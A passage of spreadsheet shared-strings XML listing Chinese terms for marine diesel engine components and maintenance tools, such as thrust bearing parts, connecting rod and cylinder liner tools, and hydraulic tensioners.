        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承环半</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>碟形螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>碟形螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位螺栓的上紧和放松</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拧紧说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器固紧样板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵固紧样板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延时继电器</t>
    </r>
  </si>
  <si>
    <r>
      <t>C81</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型时间继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形状和位置公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气管失效工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴瓦组装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座校中工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器工具箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮齿轮组装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架工作踏板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆和十字头安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承检查工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承检测工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴角度传感器组装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承盖润滑工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套打磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套保温工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套润滑报警工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机校中工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟总管安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀失效工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块滚出工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓预紧拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴齿轮组装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梅花扳手套环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>葫芦吊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑注油枪</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>千斤顶</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用钳子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用压力测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭力扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拔销装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管组装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管爪工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管修磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器调节工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器研磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器防护工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间齿轮安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承预紧拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口扭力扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆垫片安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆和十字头预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>充氮工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨单元安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成套工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用吊具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元中间齿轮工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元润滑工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元维护工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供应单元运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器失效工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓预紧拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀打磨工具和设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
